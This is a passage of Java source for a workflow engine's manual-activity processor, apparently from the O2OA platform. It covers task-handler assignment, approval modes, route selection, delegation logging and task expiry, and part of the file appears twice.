Work merge = this.arrivingMergeSameJob(aeiObjects, manual, identities); if (null != merge) { return merge; } this.arrivingPassSame(aeiObjects, identities); aeiObjects.getWork().setManualTaskIdentityList(new ArrayList<>(identities)); return aeiObjects.getWork(); } private Work arrivingMergeSameJob(AeiObjects aeiObjects, Manual manual, List<String> identities) throws Exception { if (!BooleanUtils.isTrue(manual.getManualMergeSameJobActivity())) { return null; } List<String> exists = this.arriving_sameJobActivityExistIdentities(aeiObjects, manual); if (ListTools.isNotEmpty(exists)) { Work other = aeiObjects.getWorks().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getJob(), o.getJob()) && StringUtils.equals(aeiObjects.getWork().getActivity(), o.getActivity()) && (!Objects.equals(aeiObjects.getWork(), o)); }).findFirst().orElse(null); if (null != other) { identities.removeAll(exists); if (ListTools.isEmpty(identities)) { this.mergeTaskCompleted(aeiObjects, aeiObjects.getWork(), other); this.mergeRead(aeiObjects, aeiObjects.getWork(), other); this.mergeReadCompleted(aeiObjects, aeiObjects.getWork(), other); this.mergeReview(aeiObjects, aeiObjects.getWork(), other); this.mergeAttachment(aeiObjects, aeiObjects.getWork(), other); this.mergeWorkLog(aeiObjects, aeiObjects.getWork(), other); if (ListTools.size(aeiObjects.getWork().getSplitTokenList()) > ListTools .size(other.getSplitTokenList())) { other.setSplitTokenList(aeiObjects.getWork().getSplitTokenList()); other.setSplitToken(aeiObjects.getWork().getSplitToken()); other.setSplitValue(aeiObjects.getWork().getSplitValue()); other.setSplitting(true); } aeiObjects.getUpdateWorks().add(other); aeiObjects.getDeleteWorks().add(aeiObjects.getWork()); return other; } } } return null; } private void arrivingPassSame(AeiObjects aeiObjects, List<String> identities) throws Exception { // 查找是否有passSameTarget设置 Route route = aeiObjects.getRoutes().stream().filter(o -> BooleanUtils.isTrue(o.getPassSameTarget())) .findFirst().orElse(null); // 如果有passSameTarget,有到达ArriveWorkLog,不是调度到这个节点的 if ((null != route) && ((null != aeiObjects.getArriveWorkLog(aeiObjects.getWork()))) && (!aeiObjects.getProcessingAttributes().ifForceJoinAtArrive())) { WorkLog workLog = findPassSameTargetWorkLog(aeiObjects); logger.debug("pass same target work:{}, workLog:{}.", aeiObjects.getWork(), workLog); if (null == workLog) { return; } for (TaskCompleted o : aeiObjects.getJoinInquireTaskCompleteds()) { if (StringUtils.equals(o.getActivityToken(), workLog.getArrivedActivityToken())) { List<String> values = ListUtils.intersection(identities, aeiObjects.business().organization().identity().listWithPerson(o.getPerson())); if (!values.isEmpty()) { TaskCompleted obj = new TaskCompleted(aeiObjects.getWork(), route, o); obj.setIdentity(values.get(0)); obj.setUnit(aeiObjects.business().organization().unit().getWithIdentity(obj.getIdentity())); obj.setProcessingType(TaskCompleted.PROCESSINGTYPE_SAMETARGET); obj.setRouteName(route.getName()); Date now = new Date(); obj.setStartTime(now); obj.setStartTimeMonth(DateTools.format(now, DateTools.format_yyyyMM)); obj.setCompletedTime(now); obj.setCompletedTimeMonth(DateTools.format(now, DateTools.format_yyyyMM)); obj.setDuration(0L); obj.setExpired(false); obj.setExpireTime(null); obj.setTask(null); obj.setLatest(true); aeiObjects.getCreateTaskCompleteds().add(obj); } } } } } // 计算处理人 private List<String> calculateTaskIdentities(AeiObjects aeiObjects, Manual manual) throws Exception { TaskIdentities taskIdentities = new 
TaskIdentities(); // 先计算强制处理人 if (!aeiObjects.getWork().getProperties().getManualForceTaskIdentityList().isEmpty()) { List<String> identities = new ArrayList<>(); identities.addAll(aeiObjects.getWork().getProperties().getManualForceTaskIdentityList()); identities = aeiObjects.business().organization().identity().list(identities); if (ListTools.isNotEmpty(identities)) { taskIdentities.addIdentities(identities); } } // 计算退回的结果 if (taskIdentities.isEmpty()) { Route route = aeiObjects.business().element().get(aeiObjects.getWork().getDestinationRoute(), Route.class); if ((null != route) && (StringUtils.equals(route.getType(), Route.TYPE_BACK))) { List<String> identities = new ArrayList<>(); List<WorkLog> workLogs = new ArrayList<>(); workLogs.addAll(aeiObjects.getUpdateWorkLogs()); workLogs.addAll(aeiObjects.getCreateWorkLogs()); for (WorkLog o : aeiObjects.getWorkLogs()) { if (!workLogs.contains(o)) { workLogs.add(o); } } WorkLogTree tree = new WorkLogTree(workLogs); Node node = tree.location(aeiObjects.getWork()); if (null != node) { for (Node n : tree.up(node)) { if (StringUtils.equals(manual.getId(), n.getWorkLog().getFromActivity())) { for (TaskCompleted t : aeiObjects.getTaskCompleteds()) { if (StringUtils.equals(n.getWorkLog().getFromActivityToken(), t.getActivityToken()) && BooleanUtils.isTrue(t.getJoinInquire())) { identities.add(t.getIdentity()); } } break; } } identities = aeiObjects.business().organization().identity().list(identities); if (ListTools.isNotEmpty(identities)) { taskIdentities.addIdentities(identities); } } } } if (taskIdentities.isEmpty()) { taskIdentities = TranslateTaskIdentityTools.translate(aeiObjects, manual); this.ifTaskIdentitiesEmptyForceToCreatorOrMaintenance(aeiObjects, manual, taskIdentities); this.writeToEmpowerMap(aeiObjects, taskIdentities); } return taskIdentities.identities(); } // 如果活动没有找到任何可用的处理人,那么强制设置处理人为文档创建者,或者配置的 maintenanceIdentity private void ifTaskIdentitiesEmptyForceToCreatorOrMaintenance(AeiObjects aeiObjects, Manual manual, TaskIdentities taskIdentities) throws Exception { if (taskIdentities.isEmpty()) { String identity = aeiObjects.business().organization().identity() .get(aeiObjects.getWork().getCreatorIdentity()); if (StringUtils.isNotEmpty(identity)) { logger.info("{}[{}]未能找到指定的处理人, 标题:{}, id:{}, 强制指定处理人为活动的创建身份:{}.", aeiObjects.getProcess().getName(), manual.getName(), aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), identity); taskIdentities.addIdentity(identity); } else { identity = aeiObjects.business().organization().identity() .get(Config.processPlatform().getMaintenanceIdentity()); if (StringUtils.isNotEmpty(identity)) { logger.info("{}[{}]未能找到指定的处理人, 也没有能找到工作创建人, 标题:{}, id:{}, 强制指定处理人为系统维护身份:{}.", aeiObjects.getProcess().getName(), manual.getName(), aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), identity); taskIdentities.addIdentity(identity); } else { throw new ExceptionExpectedEmpty(aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), aeiObjects.getActivity().getName(), aeiObjects.getActivity().getId()); } } } } // 更新授权,通过surface创建且workThroughManual=false 代表是草稿,那么不需要授权. 
private void writeToEmpowerMap(AeiObjects aeiObjects, TaskIdentities taskIdentities) throws Exception { // 先清空EmpowerMap aeiObjects.getWork().getProperties().setManualEmpowerMap(new LinkedHashMap<String, String>()); if (!(StringUtils.equals(aeiObjects.getWork().getWorkCreateType(), Work.WORKCREATETYPE_SURFACE) && BooleanUtils.isFalse(aeiObjects.getWork().getWorkThroughManual()))) { List<String> values = taskIdentities.identities(); values = ListUtils.subtract(values, aeiObjects.getProcessingAttributes().getIgnoreEmpowerIdentityList()); taskIdentities.empower(aeiObjects.business().organization().empower().listWithIdentityObject( aeiObjects.getWork().getApplication(), aeiObjects.getProcess().getEdition(), aeiObjects.getWork().getProcess(), aeiObjects.getWork().getId(), values)); for (TaskIdentity taskIdentity : taskIdentities) { if (StringUtils.isNotEmpty(taskIdentity.getFromIdentity())) { aeiObjects.getWork().getProperties().getManualEmpowerMap().put(taskIdentity.getIdentity(), taskIdentity.getFromIdentity()); } } } } private WorkLog findPassSameTargetWorkLog(AeiObjects aeiObjects) throws Exception { WorkLogTree tree = new WorkLogTree(aeiObjects.getWorkLogs()); List<WorkLog> parents = tree.parents(aeiObjects.getArriveWorkLog(aeiObjects.getWork())); logger.debug("pass same target rollback parents:{}.", parents); WorkLog workLog = null; for (WorkLog o : parents) { if (Objects.equals(ActivityType.manual, o.getArrivedActivityType())) { workLog = o; break; } else if (Objects.equals(ActivityType.choice, o.getArrivedActivityType())) { continue; } else if (Objects.equals(ActivityType.agent, o.getArrivedActivityType())) { continue; } else if (Objects.equals(ActivityType.invoke, o.getArrivedActivityType())) { continue; } else if (Objects.equals(ActivityType.service, o.getArrivedActivityType())) { continue; } else { break; } } logger.debug("pass same target find workLog:{}.", workLog); return workLog; } @Override protected void arrivingCommitted(AeiObjects aeiObjects, Manual manual) throws Exception { // nothing } @Override protected List<Work> executing(AeiObjects aeiObjects, Manual manual) throws Exception { List<Work> results = new ArrayList<>(); boolean passThrough = false; // 找到在当前环节已经处理过的已办 List<TaskCompleted> taskCompleteds = aeiObjects.getJoinInquireTaskCompleteds().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken())) .collect(Collectors.toList()); // 去掉已经处理过的身份 List<String> identities = ListUtils.subtract(aeiObjects.getWork().getManualTaskIdentityList(), ListTools.extractProperty(taskCompleteds, TaskCompleted.identity_FIELDNAME, String.class, true, true)); identities = aeiObjects.business().organization().identity().list(identities); // 现在处理人为空且没有参与流转的已办 if (identities.isEmpty() && taskCompleteds.isEmpty()) { identities = calculateTaskIdentities(aeiObjects, manual); logger.info("工作设置的处理人已经全部无效,重新计算当前环节所有处理人进行处理,标题:{}, id:{}, 设置的处理人:{}.", aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), identities); // 后面进行了identitis.remove()这里必须用一个新对象包装 aeiObjects.getWork().setManualTaskIdentityList(new ArrayList<>(identities)); } // 发送ProcessingSignal aeiObjects.getProcessingAttributes().push(Signal.manualExecute(aeiObjects.getWork().getActivityToken(), manual, Objects.toString(manual.getManualMode(), ""), identities)); switch (manual.getManualMode()) { case single: passThrough = this.single(aeiObjects, manual, identities); break; case parallel: passThrough = this.parallel(aeiObjects, manual, identities); break; case queue: passThrough = 
this.queue(aeiObjects, manual, identities); break; case grab: passThrough = this.single(aeiObjects, manual, identities); break; default: throw new ExceptionManualModeError(manual.getId()); } if (passThrough) { results.add(aeiObjects.getWork()); } return results; } @Override protected void executingCommitted(AeiObjects aeiObjects, Manual manual) throws Exception { // nothing } @Override protected List<Route> inquiring(AeiObjects aeiObjects, Manual manual) throws Exception { // 发送ProcessingSignal aeiObjects.getProcessingAttributes() .push(Signal.manualInquire(aeiObjects.getWork().getActivityToken(), manual)); List<Route> results = new ArrayList<>(); // 仅有单条路由 if (aeiObjects.getRoutes().size() == 1) { results.add(aeiObjects.getRoutes().get(0)); } else if (aeiObjects.getRoutes().size() > 1) { // 存在多条路由 List<TaskCompleted> taskCompletedList = aeiObjects.getJoinInquireTaskCompleteds().stream() .filter(o -> StringUtils.equals(o.getActivityToken(), aeiObjects.getWork().getActivityToken()) && aeiObjects.getWork().getManualTaskIdentityList().contains(o.getIdentity())) .collect(Collectors.toList()); String name = this.choiceRouteName(taskCompletedList, aeiObjects.getRoutes()); for (Route o : aeiObjects.getRoutes()) { if (o.getName().equalsIgnoreCase(name)) { results.add(o); break; } } } if (!results.isEmpty()) { // 清理掉强制的指定的处理人 aeiObjects.getWork().getProperties().setManualForceTaskIdentityList(new ArrayList<String>()); } return results; } // 通过已办存根选择某条路由 private String choiceRouteName(List<TaskCompleted> list, List<Route> routes) throws Exception { String result = ""; List<String> names = new ArrayList<>(); ListTools.trim(list, false, false).stream().forEach(o -> names.add(o.getRouteName())); // 进行优先路由的判断 Route soleRoute = routes.stream().filter(o -> BooleanUtils.isTrue(o.getSole())).findFirst().orElse(null); if ((null != soleRoute) && names.contains(soleRoute.getName())) { result = soleRoute.getName(); } else { // 进行默认的策略,选择占比多的 result = maxCountOrLatest(list); } if (StringUtils.isEmpty(result)) { throw new ExceptionChoiceRouteNameError( ListTools.extractProperty(list, JpaObject.id_FIELDNAME, String.class, false, false)); } return result; } private String maxCountOrLatest(List<TaskCompleted> list) { Map<String, List<TaskCompleted>> map = list.stream() .collect(Collectors.groupingBy(TaskCompleted::getRouteName)); Optional<Entry<String, List<TaskCompleted>>> optional = map.entrySet().stream().sorted((o1, o2) -> { int c = o2.getValue().size() - o1.getValue().size(); if (c == 0) { Date d1 = o1.getValue().stream().sorted(Comparator.comparing(TaskCompleted::getCreateTime).reversed()) .findFirst().get().getCreateTime(); Date d2 = o2.getValue().stream().sorted(Comparator.comparing(TaskCompleted::getCreateTime).reversed()) .findFirst().get().getCreateTime(); return ObjectUtils.compare(d2, d1); } else { return c; } }).findFirst(); return optional.isPresent() ? 
optional.get().getKey() : null; } private boolean single(AeiObjects aeiObjects, Manual manual, List<String> identities) throws Exception { boolean passThrough = false; Long count = aeiObjects.getJoinInquireTaskCompleteds().stream().filter(o -> { if (StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && (identities.contains(o.getIdentity()))) { return true; } else { return false; } }).count(); if (count > 0) { // 已经确定要通过此节点,清除可能是多余的待办 aeiObjects.getTasks().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getId(), o.getWork()); }).forEach(o -> { // 如果启用了将未处理待办转待阅,那么进行转换 if (BooleanUtils.isTrue(manual.getManualUncompletedTaskToRead())) { aeiObjects.getCreateReads() .add(new Read(aeiObjects.getWork(), o.getIdentity(), o.getUnit(), o.getPerson())); } aeiObjects.deleteTask(o); }); // 所有预计的处理人中已经有已办,这个环节已经产生了已办,可以离开换个环节。 passThrough = true; } else { // 取到期望的待办人员,由于要进行处理需要转换成可读写List if (ListTools.isEmpty(identities)) { throw new ExceptionExpectedEmpty(aeiObjects.getWork().getTitle(), aeiObjects.getWork().getId(), manual.getName(), manual.getId()); } // 删除多余的待办 aeiObjects.getTasks().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && (!ListTools.contains(identities, o.getIdentity()))) .forEach(aeiObjects::deleteTask); // 将待办已经产生的人从预期值中删除 aeiObjects.getTasks().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && (ListTools.contains(identities, o.getIdentity()))) .forEach(o -> identities.remove(o.getIdentity())); // 这里剩余的应该是没有生成待办的人员 if (!identities.isEmpty()) { for (String identity : identities) { aeiObjects.createTask(this.createTask(aeiObjects, manual, identity)); } } } return passThrough; } private boolean parallel(AeiObjects aeiObjects, Manual manual, List<String> identities) throws Exception { boolean passThrough = false; // 取得本环节已经处理的已办 List<TaskCompleted> taskCompleteds = this.listJoinInquireTaskCompleted(aeiObjects, identities); // 存在优先路由,如果有人选择了优先路由那么直接流转.需要判断是否启用了soleDirect Route soleRoute = aeiObjects.getRoutes().stream() .filter(r -> BooleanUtils.isTrue(r.getSole()) && BooleanUtils.isTrue(r.getSoleDirect())).findFirst() .orElse(null); if (null != soleRoute) { TaskCompleted soleTaskCompleted = taskCompleteds.stream() .filter(t -> BooleanUtils.isTrue(t.getJoinInquire()) && StringUtils.equals(t.getRouteName(), soleRoute.getName())) .findFirst().orElse(null); if (null != soleTaskCompleted) { this.parallelSoleTaskCompleted(aeiObjects); return true; } } // 将已经处理的人从期望值中移除 aeiObjects.getJoinInquireTaskCompleteds().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()); }).forEach(o -> identities.remove(o.getIdentity())); // 清空可能的多余的待办 aeiObjects.getTasks().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && (!ListTools.contains(identities, o.getIdentity())); }).forEach(aeiObjects::deleteTask); if (identities.isEmpty()) { // 所有人已经处理完成。 passThrough = true; } else { passThrough = false; // 先清空已经有待办的身份 aeiObjects.getTasks().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken())) .forEach(o -> identities.remove(o.getIdentity())); // 这里剩余的应该是没有生成待办的人员 if (!identities.isEmpty()) { for (String identity : identities) { aeiObjects.createTask(this.createTask(aeiObjects, manual, identity)); } } } return passThrough; } // 并行环节下如果有优先路由,那么直接走优先路由,处理的时候需要晴空所有代办 private void 
parallelSoleTaskCompleted(AeiObjects aeiObjects) throws Exception { // 清空可能的多余的待办 aeiObjects.getTasks().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()); }).forEach(aeiObjects::deleteTask); } private boolean queue(AeiObjects aeiObjects, Manual manual, List<String> identities) throws Exception { boolean passThrough = false; List<TaskCompleted> taskCompleteds = this.listJoinInquireTaskCompleted(aeiObjects, identities); // 存在优先路由 Route soleRoute = aeiObjects.getRoutes().stream().filter(r -> BooleanUtils.isTrue(r.getSole())).findFirst() .orElse(null); if (null != soleRoute) { TaskCompleted soleTaskCompleted = taskCompleteds.stream() .filter(t -> BooleanUtils.isTrue(t.getJoinInquire()) && StringUtils.equals(t.getRouteName(), soleRoute.getName())) .findFirst().orElse(null); if (null != soleTaskCompleted) { return true; } } // 存在优先路由结束 // 将已经处理的人从期望值中移除 for (TaskCompleted o : taskCompleteds) { identities.remove(o.getIdentity()); } if (identities.isEmpty()) { // 所有人已经处理完成。 passThrough = true; } else { passThrough = false; String identity = identities.get(0); // 还有人没有处理,开始判断待办,取到本环节的所有待办,理论上只能有一条待办 boolean find = false; for (Task t : aeiObjects.getTasks()) { if (StringUtils.equals(aeiObjects.getWork().getActivityToken(), t.getActivityToken())) { if (!StringUtils.equals(t.getIdentity(), identity)) { aeiObjects.deleteTask(t); } else { find = true; } } } // 当前处理人没有待办 if (!find) { aeiObjects.createTask(this.createTask(aeiObjects, manual, identity)); } } return passThrough; } // 所有有效的已办,去除 reset,retract,appendTask private List<TaskCompleted> listJoinInquireTaskCompleted(AeiObjects aeiObjects, List<String> identities) throws Exception { return aeiObjects.getJoinInquireTaskCompleteds().stream() .filter(o -> StringUtils.equals(aeiObjects.getWork().getActivityToken(), o.getActivityToken()) && identities.contains(o.getIdentity()) && BooleanUtils.isTrue(o.getJoinInquire())) .collect(Collectors.toList()); } @Override protected void inquiringCommitted(AeiObjects aeiObjects, Manual manual) throws Exception { // nothing } private void calculateExpire(AeiObjects aeiObjects, Manual manual, Task task) throws Exception { if (null != manual.getTaskExpireType()) { switch (manual.getTaskExpireType()) { case never: this.expireNever(task); break; case appoint: this.expireAppoint(manual, task); break; case script: this.expireScript(aeiObjects, manual, task); break; default: break; } } // 如果work有截至时间 if (null != aeiObjects.getWork().getExpireTime()) { if (null == task.getExpireTime()) { task.setExpireTime(aeiObjects.getWork().getExpireTime()); } else { if (task.getExpireTime().after(aeiObjects.getWork().getExpireTime())) { task.setExpireTime(aeiObjects.getWork().getExpireTime()); } } } // 已经有过期时间了,那么设置催办时间 if (null != task.getExpireTime()) { task.setUrgeTime(DateUtils.addHours(task.getExpireTime(), -2)); } else { task.setExpired(false); task.setUrgeTime(null); task.setUrged(false); } } // 从不过期 private void expireNever(Task task) { task.setExpireTime(null); } private void expireAppoint(Manual manual, Task task) throws Exception { if (BooleanUtils.isTrue(manual.getTaskExpireWorkTime())) { this.expireAppointWorkTime(task, manual); } else { this.expireAppointNaturalDay(task, manual); } } private void expireAppointWorkTime(Task task, Manual manual) throws Exception { Integer m = 0; WorkTime wt = new WorkTime(); if (BooleanUtils.isTrue(NumberTools.greaterThan(manual.getTaskExpireDay(), 0))) { m += manual.getTaskExpireDay() * wt.minutesOfWorkDay(); } if 
(BooleanUtils.isTrue(NumberTools.greaterThan(manual.getTaskExpireHour(), 0))) { m += manual.getTaskExpireHour() * 60; } if (m > 0) { Date expire = wt.forwardMinutes(new Date(), m); task.setExpireTime(expire); } else { task.setExpireTime(null); } } private void expireAppointNaturalDay(Task task, Manual manual) throws Exception { Integer m = 0; if (BooleanUtils.isTrue(NumberTools.greaterThan(manual.getTaskExpireDay(), 0))) { m += manual.getTaskExpireDay() * 60 * 24; } if (BooleanUtils.isTrue(NumberTools.greaterThan(manual.getTaskExpireHour(), 0))) { m += manual.getTaskExpireHour() * 60; } if (m > 0) { Calendar cl = Calendar.getInstance(); cl.add(Calendar.MINUTE, m); task.setExpireTime(cl.getTime()); } else { task.setExpireTime(null); } } private void expireScript(AeiObjects aeiObjects, Manual manual, Task task) throws Exception { ExpireScriptResult expire = new ExpireScriptResult(); ScriptContext scriptContext = aeiObjects.scriptContext(); Bindings bindings = scriptContext.getBindings(ScriptContext.ENGINE_SCOPE); bindings.put(ScriptFactory.BINDING_NAME_TASK, task); bindings.put(ScriptFactory.BINDING_NAME_EXPIRE, expire); // 重新注入对象需要重新运行 ScriptFactory.initialScriptText().eval(scriptContext); aeiObjects.business().element() .getCompiledScript(aeiObjects.getWork().getApplication(), manual, Business.EVENT_MANUALTASKEXPIRE) .eval(scriptContext); if (BooleanUtils.isTrue(NumberTools.greaterThan(expire.getWorkHour(), 0))) { Integer m = 0; m += expire.getWorkHour() * 60; if (m > 0) { WorkTime wt = new WorkTime(); task.setExpireTime(wt.forwardMinutes(new Date(), m)); } else { task.setExpireTime(null); } } else if (BooleanUtils.isTrue(NumberTools.greaterThan(expire.getHour(), 0))) { Integer m = 0; m += expire.getHour() * 60; if (m > 0) { Calendar cl = Calendar.getInstance(); cl.add(Calendar.MINUTE, m); task.setExpireTime(cl.getTime()); } else { task.setExpireTime(null); } } else if (null != expire.getDate()) { task.setExpireTime(expire.getDate()); } else { task.setExpireTime(null); } } private Task createTask(AeiObjects aeiObjects, Manual manual, String identity) throws Exception { String fromIdentity = aeiObjects.getWork().getProperties().getManualEmpowerMap().get(identity); String person = aeiObjects.business().organization().person().getWithIdentity(identity); String unit = aeiObjects.business().organization().unit().getWithIdentity(identity); Task task = new Task(aeiObjects.getWork(), identity, person, unit, fromIdentity, new Date(), null, aeiObjects.getRoutes(), manual.getAllowRapid()); // 是第一条待办,进行标记 task.setFirst(ListTools.isEmpty(aeiObjects.getJoinInquireTaskCompleteds())); this.calculateExpire(aeiObjects, manual, task); if (StringUtils.isNotEmpty(fromIdentity)) { aeiObjects.business().organization().empowerLog() .log(this.createEmpowerLog(aeiObjects.getWork(), fromIdentity, identity)); String fromPerson = aeiObjects.business().organization().person().getWithIdentity(fromIdentity); String fromUnit = aeiObjects.business().organization().unit().getWithIdentity(fromIdentity); TaskCompleted empowerTaskCompleted = new TaskCompleted(aeiObjects.getWork()); empowerTaskCompleted.setProcessingType(TaskCompleted.PROCESSINGTYPE_EMPOWER); empowerTaskCompleted.setIdentity(fromIdentity); empowerTaskCompleted.setUnit(fromUnit); empowerTaskCompleted.setPerson(fromPerson); empowerTaskCompleted.setEmpowerToIdentity(identity); aeiObjects.createTaskCompleted(empowerTaskCompleted); Read empowerRead = new Read(aeiObjects.getWork(), fromIdentity, fromUnit, fromPerson); aeiObjects.createRead(empowerRead); } return 
task; } private EmpowerLog createEmpowerLog(Work work, String fromIdentity, String toIdentity) { return new EmpowerLog().setApplication(work.getApplication()).setApplicationAlias(work.getApplicationAlias()) .setApplicationName(work.getApplicationName()).setProcess(work.getProcess()) .setProcessAlias(work.getProcessAlias()).setProcessName(work.getProcessName()).setTitle(work.getTitle()) .setWork(work.getId()).setJob(work.getJob()).setFromIdentity(fromIdentity).setToIdentity(toIdentity) .setActivity(work.getActivity()).setActivityAlias(work.getActivityAlias()) .setActivityName(work.getActivityName()).setEmpowerTime(new Date()); } private List<String> arriving_sameJobActivityExistIdentities(AeiObjects aeiObjects, Manual manual) throws Exception { List<String> exists = new ArrayList<>(); aeiObjects.getTasks().stream().filter(o -> { return StringUtils.equals(o.getActivity(), manual.getId()) && StringUtils.equals(o.getJob(), aeiObjects.getWork().getJob()); }).forEach(o -> exists.add(o.getIdentity())); return exists; } public class ExpireScriptResult { Integer hour; Integer workHour; Date date; public Integer getHour() { return hour; } public void setHour(Integer hour) { this.hour = hour; } public Integer getWorkHour() { return workHour; } public void setWorkHour(Integer workHour) { this.workHour = workHour; } public Date getDate() { return date; } public void setDate(Date date) { this.date = date; } public void setDate(String str) { try { this.date = DateTools.parse(str); } catch (Exception e) { logger.error(e); } } } }
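The route-selection tie-break in maxCountOrLatest above is easy to misread in stream form. Below is a standalone sketch of the same rule, using a simplified stand-in type instead of TaskCompleted (the Vote record, the demo class, and the sample data are illustrative assumptions): the route chosen by the most completed tasks wins, and when counts tie, the route with the most recent completion wins.

import java.time.Instant;
import java.util.Comparator;
import java.util.List;
import java.util.Map;
import java.util.stream.Collectors;

// Stand-in for TaskCompleted: only the two fields the tie-break rule needs.
record Vote(String routeName, Instant createTime) {}

public class RouteChoiceDemo {
	// Most votes wins; equal counts fall back to the route with the latest vote.
	static String maxCountOrLatest(List<Vote> votes) {
		Map<String, List<Vote>> byRoute = votes.stream().collect(Collectors.groupingBy(Vote::routeName));
		return byRoute.entrySet().stream()
				.sorted((a, b) -> {
					int bySize = b.getValue().size() - a.getValue().size();
					if (bySize != 0) {
						return bySize; // larger group first
					}
					Instant latestA = a.getValue().stream().map(Vote::createTime).max(Comparator.naturalOrder()).get();
					Instant latestB = b.getValue().stream().map(Vote::createTime).max(Comparator.naturalOrder()).get();
					return latestB.compareTo(latestA); // later completion first
				})
				.map(Map.Entry::getKey)
				.findFirst()
				.orElse(null);
	}

	public static void main(String[] args) {
		Instant t = Instant.parse("2024-01-01T00:00:00Z");
		List<Vote> votes = List.of(
				new Vote("agree", t), new Vote("agree", t.plusSeconds(60)),
				new Vote("reject", t.plusSeconds(120)), new Vote("reject", t.plusSeconds(180)));
		System.out.println(maxCountOrLatest(votes)); // reject - counts tie at 2, reject has the later vote
	}
}

The sketch mirrors the comparator in the record: descending group size first, then descending latest createTime, returning the winning route name or null when no completions exist.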
o2server/x_processplatform_service_processing/src/main/java/com/x/processplatform/service/processing/processor/manual/ManualProcessor.java
package com.x.processplatform.service.processing.processor.manual; import java.util.ArrayList; import java.util.Calendar; import java.util.Comparator; import java.util.Date; import java.util.LinkedHashMap; import java.util.List; import java.util.Map; import java.util.Map.Entry; import java.util.Objects; import java.util.Optional; import java.util.stream.Collectors; import javax.script.Bindings; import javax.script.ScriptContext; import org.apache.commons.collections4.ListUtils; import org.apache.commons.lang3.BooleanUtils; import org.apache.commons.lang3.ObjectUtils; import org.apache.commons.lang3.StringUtils; import org.apache.commons.lang3.time.DateUtils; import com.x.base.core.container.EntityManagerContainer; import com.x.base.core.entity.JpaObject; import com.x.base.core.project.config.Config; import com.x.base.core.project.logger.Logger; import com.x.base.core.project.logger.LoggerFactory; import com.x.base.core.project.organization.EmpowerLog; import com.x.base.core.project.script.ScriptFactory; import com.x.base.core.project.tools.DateTools; import com.x.base.core.project.tools.ListTools; import com.x.base.core.project.tools.NumberTools; import com.x.base.core.project.utils.time.WorkTime; import com.x.processplatform.core.entity.content.Read; import com.x.processplatform.core.entity.content.Task; import com.x.processplatform.core.entity.content.TaskCompleted; import com.x.processplatform.core.entity.content.Work; import com.x.processplatform.core.entity.content.WorkLog; import com.x.processplatform.core.entity.element.ActivityType; import com.x.processplatform.core.entity.element.Manual; import com.x.processplatform.core.entity.element.Route; import com.x.processplatform.core.entity.element.util.WorkLogTree; import com.x.processplatform.core.entity.element.util.WorkLogTree.Node; import com.x.processplatform.core.entity.log.Signal; import com.x.processplatform.service.processing.Business; import com.x.processplatform.service.processing.processor.AeiObjects; /** * @author Zhou Rui */ public class ManualProcessor extends AbstractManualProcessor { private static Logger logger = LoggerFactory.getLogger(ManualProcessor.class); public ManualProcessor(EntityManagerContainer entityManagerContainer) throws Exception { super(entityManagerContainer); } @Override protected Work arriving(AeiObjects aeiObjects, Manual manual) throws Exception { // 发送ProcessingSignal aeiObjects.getProcessingAttributes().push(Signal.manualArrive(aeiObjects.getWork().getActivityToken(), manual)); // 根据manual计算出来的活动处理人 List<String> identities = calculateTaskIdentities(aeiObjects, manual); // 启用同类工作相同活动节点合并,如果有合并的工作,那么直接返回这个工作. 
Work merge = this.arrivingMergeSameJob(aeiObjects, manual, identities); if (null != merge) { return merge; } this.arrivingPassSame(aeiObjects, identities); aeiObjects.getWork().setManualTaskIdentityList(new ArrayList<>(identities)); return aeiObjects.getWork(); } private Work arrivingMergeSameJob(AeiObjects aeiObjects, Manual manual, List<String> identities) throws Exception { if (!BooleanUtils.isTrue(manual.getManualMergeSameJobActivity())) { return null; } List<String> exists = this.arriving_sameJobActivityExistIdentities(aeiObjects, manual); if (ListTools.isNotEmpty(exists)) { Work other = aeiObjects.getWorks().stream().filter(o -> { return StringUtils.equals(aeiObjects.getWork().getJob(), o.getJob()) && StringUtils.equals(aeiObjects.getWork().getActivity(), o.getActivity()) && (!Objects.equals(aeiObjects.getWork(), o)); }).findFirst().orElse(null); if (null != other) { identities.removeAll(exists); if (ListTools.isEmpty(identities)) { this.mergeTaskCompleted(aeiObjects, aeiObjects.getWork(), other); this.mergeRead(aeiObjects, aeiObjects.getWork(), other); this.mergeReadCompleted(aeiObjects, aeiObjects.getWork(), other); this.mergeReview(aeiObjects, aeiObjects.getWork(), other); this.mergeAttachment(aeiObjects, aeiObjects.getWork(), other); this.mergeWorkLog(aeiObjects, aeiObjects.getWork(), other); if (ListTools.size(aeiObjects.getWork().getSplitTokenList()) > ListTools .size(other.getSplitTokenList())) { other.setSplitTokenList(aeiObjects.getWork().getSplitTokenList()); other.setSplitToken(aeiObjects.getWork().getSplitToken()); other.setSplitValue(aeiObjects.getWork().getSplitValue()); other.setSplitting(true); } aeiObjects.getUpdateWorks().add(other); aeiObjects.getDeleteWorks().add(aeiObjects.getWork()); return other; } } } return null; } private void arrivingPassSame(AeiObjects aeiObjects, List<String> identities) throws Exception { // 查找是否有passSameTarget设置 Route route = aeiObjects.getRoutes().stream().filter(o -> BooleanUtils.isTrue(o.getPassSameTarget())) .findFirst().orElse(null); // 如果有passSameTarget,有到达ArriveWorkLog,不是调度到这个节点的 if ((null != route) && ((null != aeiObjects.getArriveWorkLog(aeiObjects.getWork()))) && (!aeiObjects.getProcessingAttributes().ifForceJoinAtArrive())) { WorkLog workLog = findPassSameTargetWorkLog(aeiObjects); logger.debug("pass same target work:{}, workLog:{}.", aeiObjects.getWork(), workLog); if (null == workLog) { return; } for (TaskCompleted o : 